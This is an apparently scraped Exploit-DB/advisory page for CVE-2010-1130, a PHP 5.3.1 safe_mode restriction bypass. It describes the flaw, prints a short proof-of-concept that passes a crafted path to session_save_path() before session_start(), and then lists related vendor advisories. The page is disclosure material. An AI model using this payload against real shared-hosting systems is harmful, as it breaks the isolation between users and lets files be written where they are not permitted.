Lucene search
Grzegorz StachowiakEDB-ID:33625HistoryFeb 11, 2010 - 12:00 a.m.
PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot
2010-02-1100:00:00
Grzegorz Stachowiak
www.exploit-db.com
34
source: https://www.securityfocus.com/bid/38182/info
PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; the 'safe_mode' restrictions are assumed to isolate users from each other.
{
session_save_path(";;/byp/;a/../../humhum");
session_start();
}Related
ubuntucve
ubuntucve
CVE-2010-1130
2010-03-26 00:00:00
cvelist
cvelist
CVE-2010-1130
2010-03-26 20:00:00
cve
cve
CVE-2010-1130
2010-03-26 20:30:00
prion
prion
Design/Logic Flaw
2010-03-26 20:30:00
nvd
nvd
CVE-2010-1130
2010-03-26 20:30:00
nessus
nessus
PHP < 5.3.2 / 5.2.13 Multiple Vulnerabilities
2010-02-26 00:00:00
Mandriva Linux Security Advisory : php (MDVSA-2010:058)
2010-03-11 00:00:00
openvas
openvas
Mandriva Update for mandriva-release MDVA-2010:058 (mandriva-release)
2010-02-15 00:00:00
Mandriva Update for mandriva-release MDVA-2010:058 (mandriva-release)
2010-02-15 00:00:00
Ubuntu: Security Advisory (USN-989-1)
2010-09-22 00:00:00
ubuntu
ubuntu
PHP vulnerabilities
2010-09-20 00:00:00
securityvulns
securityvulns
[USN-989-1] PHP vulnerabilities
2010-09-27 00:00:00
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00